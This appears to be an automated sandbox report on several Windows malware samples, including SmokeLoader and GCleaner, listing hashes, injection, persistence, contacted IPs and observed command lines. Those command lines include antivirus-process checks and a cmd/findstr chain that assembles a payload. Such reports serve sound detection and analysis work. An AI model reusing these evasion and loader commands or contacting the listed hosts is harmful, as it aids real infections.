MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar800E.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 880

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 1048

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 1144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 1188

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 884

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp
US 208.67.104.97:80 tcp

Files

memory/916-1-0x0000000000790000-0x0000000000890000-memory.dmp

memory/916-2-0x0000000000530000-0x000000000056F000-memory.dmp

memory/916-3-0x0000000000400000-0x0000000000443000-memory.dmp

memory/916-4-0x0000000000790000-0x0000000000890000-memory.dmp

memory/916-5-0x0000000000400000-0x000000000045E000-memory.dmp

memory/916-6-0x0000000000530000-0x000000000056F000-memory.dmp

memory/916-7-0x0000000000400000-0x0000000000443000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 444 set thread context of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\at.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2720 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\at.exe
PID 2720 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\at.exe
PID 2720 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\at.exe
PID 2720 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\cmd.exe
PID 2720 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\cmd.exe
PID 2720 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 1060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 1060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 1060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1060 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1060 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1060 wrote to memory of 2288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1060 wrote to memory of 2288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1060 wrote to memory of 2288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1060 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1060 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1060 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1060 wrote to memory of 4992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1060 wrote to memory of 4992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1060 wrote to memory of 4992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1060 wrote to memory of 3900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1060 wrote to memory of 3900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1060 wrote to memory of 3900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1060 wrote to memory of 444 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 1060 wrote to memory of 444 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 1060 wrote to memory of 444 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 1060 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1060 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1060 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3416 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3416 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3416 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 444 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 444 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 444 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 444 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 444 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe"

C:\Windows\SysWOW64\at.exe

at 3874982763784yhwgdfg78234789s42809374918uf

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Film.aspx & ping -n 5 localhost

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq AvastUI.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "avastui.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq AVGUI.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "avgui.exe"

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^otPcqYaF$" Deliver.aspx

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

Tanks.exe.pif A

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 bDIATguLPNddTCYKKaxjQJVwvtXO.bDIATguLPNddTCYKKaxjQJVwvtXO udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Film.aspx

MD5 8eb593f08a4cca9959a469af6528ac0d
SHA1 8f4ae3c90b6d653eb75224683358f12dfc442dca
SHA256 7903967eca6727d611e46d666d2871d4438e9bc65ea185e01787c8a8a3e5ce70
SHA512 631403ca6e37a317158ba583e5b0f05e83157abc4cb4865f8d0d8f6e11ef39ab150fe948961aebcaff5c01ace0345ca6dc3882306ab0ce84eec6c1dfdf822ca9

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Deliver.aspx

MD5 701381da8e4a87f18a22b98eee09a22b
SHA1 f5ff5c1714155b853a8335b1d359a010c012c596
SHA256 8b21bc4f93cc9a8438ec08d1385f2d7dead6291a741fdfe7b6960c9f9917f6b3
SHA512 55ef35ce31c1fac2ff91efb3b4a5f646f3cfc7a0c4592f9da3e444a6472203608e224cf55dfa5c79025247c41aa8cbad759ef65dee9f95fe5c244dee239dc141

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Accurate.aspx

MD5 ffc713ff8173dac3c96bc583eb916705
SHA1 3c1b3e1eb258e304722ecc876820a470d491467d
SHA256 8d9c5d3eb7d4bfeb8ab1c5f4dde38dea52624ed80b188648fbab2ada88505ae4
SHA512 8af86a88e0bb60941ec5a55678c97f9a25518f2e140fc2e792115cb653b5f5a745630d970492565944116f3c5e5dc053c22b60ad8287ce5b921e47371125bc8f

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

MD5 6987e4cd3f256462f422326a7ef115b9
SHA1 71672a495b4603ecfec40a65254cb3ba8766bbe0
SHA256 3e26723394ade92f8163b5643960189cb07358b0f96529a477d37176d68aa0a0
SHA512 4b1d7f7ffee39a2d65504767beeddd4c3374807a93889b14e7e73db11e478492dec349aedca03ce828f21a66bb666a68d3735443f4249556e10825a4cd7dfeb4

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xEvsgieS.dll

MD5 4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1 e16506f662dc92023bf82def1d621497c8ab5890
SHA256 767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA512 9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

memory/444-31-0x0000000000A20000-0x0000000000B0B000-memory.dmp

memory/5032-32-0x0000000000A20000-0x0000000000B0B000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:04

Platform

win7-20240903-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 168

Network

N/A

Files

memory/2088-1-0x00000000005D0000-0x00000000006D0000-memory.dmp

memory/2088-2-0x0000000000220000-0x0000000000229000-memory.dmp

memory/2088-3-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2088-5-0x0000000000220000-0x0000000000229000-memory.dmp

memory/2088-4-0x0000000000400000-0x0000000000448000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win7-20241010-en

Max time kernel

142s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Network

Country Destination Domain Proto
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp

Files

memory/576-1-0x00000000005B0000-0x00000000006B0000-memory.dmp

memory/576-3-0x0000000000400000-0x000000000045E000-memory.dmp

memory/576-2-0x0000000000400000-0x0000000000443000-memory.dmp

memory/576-4-0x00000000005B0000-0x00000000006B0000-memory.dmp

memory/576-5-0x0000000000400000-0x0000000000443000-memory.dmp

memory/576-6-0x0000000000400000-0x000000000045E000-memory.dmp